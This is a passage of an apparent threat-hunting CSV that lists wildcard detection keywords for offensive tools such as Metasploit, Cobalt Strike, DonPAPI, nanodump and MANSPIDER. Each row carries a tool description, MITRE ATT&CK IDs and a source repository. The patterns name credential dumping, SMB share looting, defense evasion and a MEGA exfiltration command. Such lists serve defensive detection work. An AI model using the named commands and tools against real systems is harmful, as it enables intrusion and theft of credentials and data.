is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*malwaredllc*","offensive_tool_keyword","byob","BYOB is an open-source post-exploitation framework for students. Pre-built C2 server Custom payload generator 12 post-exploitation modules It is designed to allow students and developers to easily implement their own code and add cool new features without having to write a C2 server or Remote Administration Tool from scratch","T1024 - T1059 - T1064 - T1002 - T1071","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/malwaredllc/byob","1","0","N/A","N/A","10","8506","2072","2023-10-02T14:55:32Z","2017-12-18T09:10:12Z" +"*man_in_the_browser.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*man_spider.manspider:main*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*ManagedEasyHook.dll*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*manageengine_adselfservice_plus_cve_2022_28810.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*manageengine_xnode/CVE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*manager/keepass.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*manager/mRemoteNG.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*mandiant/DueDLLigence*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*mandiant/gocrack*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - 
TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*mandiant/msi-search*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*mandllinject *","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","0","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" +"*manspider * -d * -u * -p *","offensive_tool_keyword","MANSPIDER","Spider entire networks for 
juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider */24 -f *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider --threads * -d * -u * -H * --content admin*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*manspider*--loot-dir*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider*--sharenames*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider.py*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider.spiderling*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider_scan*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*MANSPIDER-master*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*map_payload_dll*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*map-get-tls-alternative-names *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*mapper_cve_exploit.py*","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","458","106","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" +"*masky_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*masscan -c *","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*masscan --nmap*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*masscan -p*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*masscan* -p*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*massdns -r *.txt*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*master/bootkit/src*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*master/EncryptedZIP*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP 
file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*master/HookDetector*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*master/ImplantSSP/*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*master/SwampThing*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*master/UnquotedPath*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*MATCH (c:Computer {unconsraineddelegation:true}) RETURN c*","greyware_tool_keyword","Neo4j","Neo4j queries - Computers in Unconstrained Delegations","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*MATCH (c:Computer)*(t:Computer)* *-[:AllowedToDelegate]* return p*","greyware_tool_keyword","Neo4j","Neo4j queries - Computers AllowedToDelegate to other computers","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*MATCH p=(u:User)-[:SQLAdmin]*(c:Computer) return p*","greyware_tool_keyword","Neo4j","Neo4j queries - Potential SQL Admins","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*matterpreter*","offensive_tool_keyword","Github Username","github username hosting 
offensive tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/matterpreter","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*matterpreter/DefenderCheck*","offensive_tool_keyword","DefenderCheck","Identifies the bytes that Microsoft Defender flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*matterpreter/Shhmon*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" +"*MattKeeley/Spoofy*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*MayankPandey01/Jira-Lens*","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" +"*mbrg/power-pwn*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*mcafee_epo2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*McpManagementPotato.*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" +"*md *.::$index_allocation*","greyware_tool_keyword","$index_allocation","creation of hidden folders (and file) via ...$.......::$index_allocation","T1027.001 - T1564.001","TA0005 ","N/A","N/A","Defense Evasion","https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*Md4-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Md5-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*mDNSSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*MDSDLL_x64.dll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*MDSDLL_x86.dll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes 
the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*mdsecactivebreach*","offensive_tool_keyword","Github Username","MDSecs ActiveBreach Team. own a github repo with lots of exploitation tools https://www.mdsec.co.uk/services/red-teaming/","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*mdsecactivebreach/CACTUSTORCH*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*mdsecactivebreach/Farmer*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" +"*med0x2e/GadgetToJScript*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" +"*med0x2e/SigFlip*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*med0x2e/SigFlip*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*media_variable_file_cryptography.py*","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" +"*megacmd -conf * put *mega:*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - 
